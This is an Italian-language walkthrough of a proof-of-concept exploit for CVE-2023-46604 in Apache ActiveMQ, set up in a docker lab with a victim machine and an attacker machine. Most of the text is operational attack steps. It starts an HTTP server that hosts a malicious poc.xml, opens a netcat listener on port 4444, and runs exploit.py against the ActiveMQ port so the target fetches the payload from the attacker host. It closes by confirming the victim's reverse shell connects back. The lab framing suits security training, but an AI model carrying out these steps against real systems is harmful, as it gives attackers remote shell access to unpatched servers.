
PoC exploit per CVE-2023-46604 che prende di mira Apache ActiveMQ, fornendo una reverse shell tramite payload XML appositamente costruito su HTTP.

Costruire un docker-compose con 2 immagini: macchina vittima e macchina target, secondo l'ambiente richiesto. Sulla macchina vittima, avviare ActiveMQ
Passare alla macchina attaccante: • Avviare il servizio HTTP per inviare il PoC: python3 -m http.server
• Usare netcat per mettersi in ascolto sulla macchina attaccante nc -nlvp 4444
• Inviare il payload che crea una reverse shell verso la macchina attaccante python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Dove:
Si può notare che, dopo aver eseguito il comando per eseguire il file 'exploit.py', lo exploit invia il pacchetto 'poc.xml' dal web server al target, ovvero l'indirizzo del servizio ActiveMQ in esecuzione sul server di destinazione. Inoltre, il web server HTTP sulla macchina attaccante riceve la richiesta inviata dall'indirizzo IP della macchina target.
Dopo l'invio del payload, passare al terminale in ascolto sulla porta 4444 della macchina attaccante. Si vede che la reverse shell della macchina vittima è stata inviata.